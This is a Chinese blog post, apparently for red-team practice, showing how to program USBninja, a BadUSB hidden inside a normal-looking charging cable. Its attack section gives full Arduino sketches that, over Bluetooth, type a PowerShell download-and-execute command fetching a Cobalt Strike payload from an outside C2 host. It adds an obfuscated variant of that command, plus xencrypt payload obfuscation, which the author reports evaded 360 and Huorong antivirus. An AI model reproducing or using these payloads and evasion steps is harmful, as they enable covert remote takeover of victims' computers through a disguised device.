<!DOCTYPE html>
<html lang="zh-CN">

  <head>
  <meta charset="utf-8">
  <meta name="author" content="zchengsite, 1451426471@qq.com" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  
  
  <title>usbninja | 大好人的博客</title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

<meta name="generator" content="Hexo 4.2.1"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/"><img src="/images/avatar.png" alt=""></a>
    <div class="nickname"><a href="/">Oranges</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">归档</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">分类</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">朋友</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  
  
  
  
  
  
  
  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">usbninja</div>
      <div class="post-attach">
        <span class="post-pubtime">2020-07-15</span>
        
      </div>
      <div class="markdown-body">
        <h1 id="1-USBninja介绍"><a href="#1-USBninja介绍" class="headerlink" title="1.USBninja介绍"></a>1.USBninja介绍</h1><p>USBninja是一种伪装成数据线的蓝牙远控HID（Human Interface Device）。<br><img src="usbninja/9f3ece81e9cde98521b60a23007567b8.png" alt="image.png"><br>它的外形跟普通的数据线一模一样，有Micro、 Type C 、Lightning三种数据线形式。并且可以正常给手机、平板甚至PC机进行供电甚至传输数据。但是收到蓝牙遥控器（BLE4.0，理论传输距离100m）或者手机APP发起指令时，它就会执行一系列模拟键盘输入或鼠标点击操作，隐蔽传递的payload进行攻击。<br>不久前，USBninja发布了自己的Pro版本，增加了手机自定义payload，支持了更多的payload，使用了BLE 5.1，最大传输距离达到了300m。<br><img src="usbninja/481a622e289664dd4a4a3dd2a9b82200.png" alt="image.png"><br>相对于传统的U盘型的BADUSB，如RUBBER DUCKY、Arduino Leonardo、Digispark、WHID等。USBninja更隐蔽、更实用。<br><img src="usbninja/478c7114d94f3e385619161e6aa28dac.png" alt="image.png"><br>同样的伪装数据线的还有国内的HackUSB cable。<br>它的缺点也很显而易见，贵。<br><img src="usbninja/79d670ab5490185320faa637edb5020f.png" alt="image.png"><br>相比较，最便宜的HID——Digispark淘宝才几块钱左右。<br><img src="usbninja/43c8d2a6fd808086239761193add0023.png" alt="image.png"></p>
<h1 id="2-环境安装"><a href="#2-环境安装" class="headerlink" title="2.环境安装"></a>2.环境安装</h1><p>首先下载安装Arduino<br><a href="https://www.arduino.cc/en/Main/Software" target="_blank" rel="noopener">https://www.arduino.cc/en/Main/Software</a><br><img src="usbninja/b527660a6d5640653869dcbbea660886.png" alt="image.png"><br>下载安装USBninja驱动程序<br><a href="https://usbninja.com/drivers\_tools/USBninja\_BOOT\_driver.zip" target="_blank" rel="noopener">https://usbninja.com/drivers\_tools/USBninja\_BOOT\_driver.zip</a><br>打开Arduino的文件—首选项<br><img src="usbninja/27dd292285a1a0ee231eaa42236a7dec.png" alt="image.png"><br>在附加开发板管理网站输入<br><a href="http://usbninja.com/arduino/package\_USBNinja\_index.json" target="_blank" rel="noopener">http://usbninja.com/arduino/package\_USBNinja\_index.json</a><br><img src="usbninja/58d3b1860678a8e0b94b790bb0541bd3.png" alt="image.png"><br>打开工具—开发板管理器，会自动加载usbninja的开发板信息，点击安装。<br><img src="usbninja/0aee292c124c5bfb821bb051ab40daeb.png" alt="image.png"><br>安装成功后，就可以直接在工具—开发板看到usbninja了。<br><img src="usbninja/7d97c8658e944b00063d5016447acf05.png" alt="image.png"></p>
<h1 id="3-烧录程序"><a href="#3-烧录程序" class="headerlink" title="3.烧录程序"></a>3.烧录程序</h1><p>在文件—示例—NinjaKeyboard中选择BLERemoteKeyboard，这是usbninja官方提供的代码。<br><img src="usbninja/a5fa2fa9cf112fe8e71c6afaba5980e0.png" alt="image.png"><br>默认的示例文件代码：<br><img src="usbninja/9d01250a04a38472515951333733f5a9.png" alt="image.png"><br>点击上传后，会等待60秒钟。<br><img src="usbninja/4c6e1329cd1e86c1c4552f7d6444db88.png" alt="image.png"><br>这个时候将磁环贴近usbninja的usb塑料处，并且插入电脑。注意：只有用贴上磁环数据线才会进入烧录模式，先插入电脑后贴上磁环也不行。<br><img src="usbninja/5e567c8073acf07be1a38c59a56c2556.png" alt="image.png"><br>插入后就可以取下磁环了，并且程序会进行烧录。<br><img src="usbninja/49aa491b119026ef1e0d242811a7ccf7.png" alt="image.png"><br>到此为止，程序就烧录成功了。<br>插入电脑进行测试，当按下A时，会win+R 输入notepad打开记事本，并且进行输入，当按下B时，会输入另外一行。<br><img src="usbninja/ac18ece661b0a205e27328d1937bd0fa.png" alt="image.png"></p>
<h1 id="4-实战CS上线"><a href="#4-实战CS上线" class="headerlink" title="4.实战CS上线"></a>4.实战CS上线</h1><p>Badusb可以实现很多功能，其中最主要的就是执行恶意代码，只要向目标植入了恶意代码，那么几乎所以操作我们都可以显示了。这里我们就演示一次如何利用USBninja上线cobaltstrike。<br>首先我们通过cobaltstrike生成payload，为了方便执行和免杀，我选择生成powershell的payload。<br><img src="usbninja/766329a9adba5c02911a7fb34eaba6d5.png" alt="image.png"><br>接下来我们对生成的powershell文件进行免杀。<br>可以使用InvokeObfuscation或者xencrypt。<br>我这里使用的是xencrypt<br><a href="https://github.com/the-xentropy/xencrypt" target="_blank" rel="noopener">https://github.com/the-xentropy/xencrypt</a><br><img src="usbninja/abacc417112b8babf345ba90f1168587.png" alt="image.png"><br>混淆66次后，免杀效果就很好了。<br>混淆前：<br><img src="usbninja/4e09d0c833752b7bb237552f3fee1238.png" alt="image.png"><br>混淆后：<br><img src="usbninja/1a3e5ec38f92f00ce268e19c805c8c19.png" alt="image.png"><br>缺点是生成的文件比较大。<br><img src="usbninja/d9d42f5fa50cc78a8544643bc1b0a9b0.png" alt="image.png"><br>免杀好ps1文件后，接下来开始编写烧录程序。<br>思路很简单，win+R调出运行框，然后输入powershell IEX(New-Object Net.WebClient).DownloadString(“<a href="http://x.x.x.x/2.ps1&quot;)从服务器下载运行ps1文件。" target="_blank" rel="noopener">http://x.x.x.x/2.ps1&quot;)从服务器下载运行ps1文件。</a><br>最终代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;NinjaKeyboard.h&gt;</span><br><span class="line">void setup() &#123;&#125; </span><br><span class="line">void loop() &#123;&#125;</span><br><span class="line">void payloadA()</span><br><span class="line">&#123;</span><br><span class="line">    USBninjaOnline();</span><br><span class="line">	  NinjaKeyboard.begin();</span><br><span class="line">    NinjaKeyboard.delay(1000);</span><br><span class="line">    NinjaKeyboard.sendKeyStroke(0);</span><br><span class="line">    NinjaKeyboard.delay(1000);</span><br><span class="line">    NinjaKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);</span><br><span class="line">    NinjaKeyboard.delay(100);</span><br><span class="line">    NinjaKeyboard.print(F(&quot;powershell IEX(New-Object Net.WebClient).DownloadString(&#39;http:&#x2F;&#x2F;c2.mtfly.net&#x2F;2.ps1&#39;)&quot;));</span><br><span class="line">    NinjaKeyboard.sendKeyStroke(KEY_ENTER); </span><br><span class="line">  	NinjaKeyboard.end();</span><br><span class="line">    USBninjaOffline();</span><br><span class="line">  	NinjaKeyboard.begin();</span><br><span class="line">&#125;</span><br><span class="line">void payloadB()&#123;&#125;</span><br></pre></td></tr></table></figure>

<p>我测试机安装了360安全卫士+火绒，当执行代码时，360进行了风险提示。<br><img src="usbninja/71b5e3454183dba38beea86c0a53d030.png" alt="image.png"><br>这里面我们有两种解决方案，第一种我们可以通过usbninja模拟鼠标操作，点击“允许运行”。第二种我们混淆执行的命令，绕过360。<br>我这里采用了第二种方式，将win+R后输入的代码稍作混淆，修改为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe ”$a1&#x3D;&#39;IEX ((new-objectnet.webclient).downl&#39;;$a2&#x3D;&#39;oadstring(&#39;&#39;http:&#x2F;&#x2F;c2.mtfly.net&#x2F;2.ps1&#39;&#39;))&#39;;$a3&#x3D;&quot;$a1,$a2&quot;;IEX(-join $a3)&quot;&quot;</span><br></pre></td></tr></table></figure>
<p><img src="usbninja/7a2fe3887535fa25d3acb115f046976b.png" alt="image.png"><br>修改烧录程序时，要注意对双引号要进行转义，最终烧录的代码为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;NinjaKeyboard.h&gt;</span><br><span class="line">void setup() &#123;&#125; </span><br><span class="line">void loop() &#123;&#125;</span><br><span class="line">void payloadA()</span><br><span class="line">&#123;</span><br><span class="line">    USBninjaOnline();</span><br><span class="line">	  NinjaKeyboard.begin();</span><br><span class="line">    NinjaKeyboard.delay(1000);</span><br><span class="line">    NinjaKeyboard.sendKeyStroke(0);</span><br><span class="line">    NinjaKeyboard.delay(1000);</span><br><span class="line">    NinjaKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);   </span><br><span class="line">    NinjaKeyboard.delay(100);</span><br><span class="line">    NinjaKeyboard.print(F(&quot;powershell \&quot;$a1&#x3D;&#39;IEX ((new-object net.webclient).downl&#39;;$a2&#x3D;&#39;oadstring(\&#39;&#39;http:&#x2F;&#x2F;c2.mtfly.net&#x2F;2.ps1\&#39;&#39;))&#39;;$a3&#x3D;\&quot;$a1,$a2\&quot;;IEX(-join $a3)\&quot;&quot;));</span><br><span class="line">    NinjaKeyboard.sendKeyStroke(KEY_ENTER); </span><br><span class="line">  	NinjaKeyboard.end();</span><br><span class="line">    USBninjaOffline();</span><br><span class="line">  	NinjaKeyboard.begin();  </span><br><span class="line">&#125;</span><br><span class="line">void payloadB()&#123;&#125;</span><br></pre></td></tr></table></figure>
<p>最后成功绕过360安全卫士+火绒杀毒软件，成功上线。<br><img src="usbninja/cac8da4711af09d76980bc95c207c00d.png" alt="image.png"></p>
<h1 id="5-后记"><a href="#5-后记" class="headerlink" title="5.后记"></a>5.后记</h1><p>前段时间看到了一篇新闻：<br><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/" target="_blank" rel="noopener">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/</a><br>国外安全研究员发现黑客组织FIN7（主要攻击酒店和零售业的APT组织。）将BADUSB伪装礼品卡对目标发起攻击。<br><img src="usbninja/9a856c91dcf28b4e5ab2ecd3106ab7f4.png" alt="image.png"><br>黑客通过给客户寄BADUSB，当用户将其插入电脑后，会自动执行powershell脚本，下载并植入恶意程序，从而控制目标主机。<br><img src="usbninja/16c79b2d9c5eafa4b2fcb102a40d3496.png" alt="image.png"><br>随着技术的发展，各种伪装HID设备层出不穷。<br>有伪装在鼠标内的：<br><img src="usbninja/731910deafb6cf6374eb84e0ac966557.png" alt="image.png"><br>伪装成USB插头的小礼品的：<br><img src="usbninja/4a688bf56d3eb28303b5003cf0c33cc1.png" alt="image.png"><br>相信在不久的将来，我们会在各种APT攻击、甚至护网演练中看到更多的HID攻击的应用。</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">2020-07-15</span>
            
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div class="post-catalog" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-USBninja介绍"><span class="toc-text">1.USBninja介绍</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-环境安装"><span class="toc-text">2.环境安装</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-烧录程序"><span class="toc-text">3.烧录程序</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-实战CS上线"><span class="toc-text">4.实战CS上线</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-后记"><span class="toc-text">5.后记</span></a></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        





      </div>
    
  </div>

  
        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" href="https://github.com/zchengsite/hexo-theme-oranges" target="_blank" rel="noopener">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="email" href="mscsdfsaw***@163.com">
            <i class="iconfont icon-envelope"></i>
          </a>
        </li>
      
        <li>
          <a title="facebook" href="">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" href="">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
        <li>
          <a title="微信" href="">
            <i class="iconfont icon-wechat"></i>
          </a>
        </li>
      
        <li>
          <a title="微博" href="">
            <i class="iconfont icon-weibo"></i>
          </a>
        </li>
      
        <li>
          <a title="rss" href="/atom.xml">
            <i class="iconfont icon-rss"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      <a href="https://github.com/zchengsite/hexo-theme-oranges" target="_blank" rel="noopener">Copyright © Oranges 2020</a>
    </div>
  
    <div class="footer-more">
      <a href="https://github.com/zchengsite/hexo-theme-oranges" target="_blank" rel="noopener">Theme by Oranges | Powered by Hexo</a>
    </div>
  
</div>

      </div>

      <div class="back-to-top hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



    </div>
  </body>
</html>
